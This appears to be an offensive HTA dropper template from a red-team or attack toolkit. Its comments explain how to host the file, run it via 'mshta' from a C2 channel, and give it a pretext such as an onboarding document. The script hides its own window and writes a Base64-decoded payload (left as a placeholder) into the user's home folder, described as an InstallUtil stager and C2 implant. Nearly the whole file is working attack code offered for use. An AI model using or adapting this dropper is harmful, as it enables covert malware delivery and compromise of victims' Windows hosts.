// This HTA file will drop any Base64 encoded file to the target Windows host, saving it as whatever filename you set in the code.
// Simply add your Base64 encoded file to the source below in the placeholder, modify the filenames and document titles to
// match any pretext you might be using. Host the HTA file on a web server and use the following command in a terminal or shell process
// via your C2 to execute:  
//       mshta <URL to HTA>
//
// After it's executed. you should find the file you needed to upload in the user's home directory "C:\Users\username"
//
// OpSec note: This script will flash a small, almost unoticeable box in the bottom left corner of the screen for about a half second. 
// It may be visible for a bit longer if the file you're dropping is overly large. Test in your own environment with your full payload
// to see how long it stays visible.

<!DOCTYPE html> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HTA:APPLICATION ID="ONBOARDING" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"> <!-- Change the ID to match your pretext !-->
<head> 
    <title>ONBOARDING DOCUMENT</title><!--Change this to match your pretext !-->
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=9">
    <script language="javascript">
        //Hide the MSHTA window
        window.resizeTo(0,0);
        
        //Get the current path
        function getCurrentPath()
        {
            var fso = new ActiveXObject("Scripting.FileSystemObject");
            return fso.GetFolder(".").Path;
        }

        //Get the path to the User/<username> folder
        function getUserLocation()
        {
            var usersig = new ActiveXObject("wscript.shell");
            var username = usersig.ExpandEnvironmentStrings("%username%");
            var fso = new ActiveXObject("Scripting.FileSystemObject");
            var pathu = "C:\\Users\\" + username;
            if(!fso.FolderExists(pathu)) {
                fso.CreateFolder(pathu);
            }
            return fso.GetFolder(pathu).Path;
        }

        var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=Base64._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},decode:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=Base64._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/rn/g,"n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}};
        
        //Write the InstallUtil stager and the compressed/encoded grunt to files. Change the filenames to match your pretext. Don't forget to change the filename in the runIt() function too!
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var write_id;
        var writelocation = getUserLocation();
        var v = fso.CreateTextFile(writelocation + "\\enroll.txt", true);
        v.WriteLine(Base64.decode("<Base64 encoded file goes here>"));
        v.Close();
        window.close();
    </script>
</head>
<body>
</body>
</html>
